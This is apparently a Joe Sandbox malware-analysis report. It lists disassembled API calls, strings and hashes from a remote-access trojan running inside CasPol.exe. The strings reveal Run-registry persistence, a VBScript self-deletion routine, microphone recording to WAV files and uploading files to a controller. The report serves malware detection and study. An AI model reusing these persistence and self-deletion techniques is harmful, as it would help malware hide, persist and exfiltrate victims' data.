                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                              • API String ID: 4250697656-2665858469
                                                                              • Opcode ID: 825ed05686e146a340023780a1e1ca3d9c8f627674e2c185f9ef4d809754755e
                                                                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                              • Opcode Fuzzy Hash: 825ed05686e146a340023780a1e1ca3d9c8f627674e2c185f9ef4d809754755e
                                                                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                              • API String ID: 3797177996-1998216422
                                                                              • Opcode ID: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                              • Opcode Fuzzy Hash: e8105bd03a003de6c5dada70ee61526a4ba484f7441331beee26882055ccc7fa
                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                              APIs
                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                              • API String ID: 738084811-1408154895
                                                                              • Opcode ID: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                              • Opcode Fuzzy Hash: 42c4f1343a04b3ab5fe0180adc9416f5c847284e3e603b636eb4f112ec7e7d31
                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Write$Create
                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                              • API String ID: 1602526932-4212202414
                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                              • API String ID: 1646373207-165202446
                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                              • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                              • API String ID: 1579085052-1280438975
                                                                              • Opcode ID: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                              • Opcode Fuzzy Hash: 8eb7d02a36940a0ff91cf94f27f2f5ad6cb7c1a7bb912e115a66a538726193f8
                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                              • String ID: ?
                                                                              • API String ID: 3941738427-1684325040
                                                                              • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                              • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 3899193279-0
                                                                              • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                              • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                              • API String ID: 1223786279-3931108886
                                                                              • Opcode ID: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                              • Opcode Fuzzy Hash: 92c82ffc14c9d0d4cdbee43c6648559f3b797691cc56d5ec9c55932e8503e442
                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                              • API String ID: 2490988753-744132762
                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                              • String ID: Close
                                                                              • API String ID: 1657328048-3535843008
                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$Info
                                                                              • String ID:
                                                                              • API String ID: 2509303402-0
                                                                              • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                              • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                              • API String ID: 1884690901-3066803209
                                                                              • Opcode ID: 3ccb7c67a34d97c7a1d2f7c16334c5644f3cdcc407d07e35d92dbabba6a1fd4e
                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                              • Opcode Fuzzy Hash: 3ccb7c67a34d97c7a1d2f7c16334c5644f3cdcc407d07e35d92dbabba6a1fd4e
                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                              APIs
                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                              • API String ID: 3795512280-3163867910
                                                                              • Opcode ID: ee6ca423a3e12f131acdf7c7063f067e3c90c3dd4c23d2ba82e05310d5c23a6f
                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                              • Opcode Fuzzy Hash: ee6ca423a3e12f131acdf7c7063f067e3c90c3dd4c23d2ba82e05310d5c23a6f
                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                              • _free.LIBCMT ref: 004500A6
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 004500C8
                                                                              • _free.LIBCMT ref: 004500DD
                                                                              • _free.LIBCMT ref: 004500E8
                                                                              • _free.LIBCMT ref: 0045010A
                                                                              • _free.LIBCMT ref: 0045011D
                                                                              • _free.LIBCMT ref: 0045012B
                                                                              • _free.LIBCMT ref: 00450136
                                                                              • _free.LIBCMT ref: 0045016E
                                                                              • _free.LIBCMT ref: 00450175
                                                                              • _free.LIBCMT ref: 00450192
                                                                              • _free.LIBCMT ref: 004501AA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
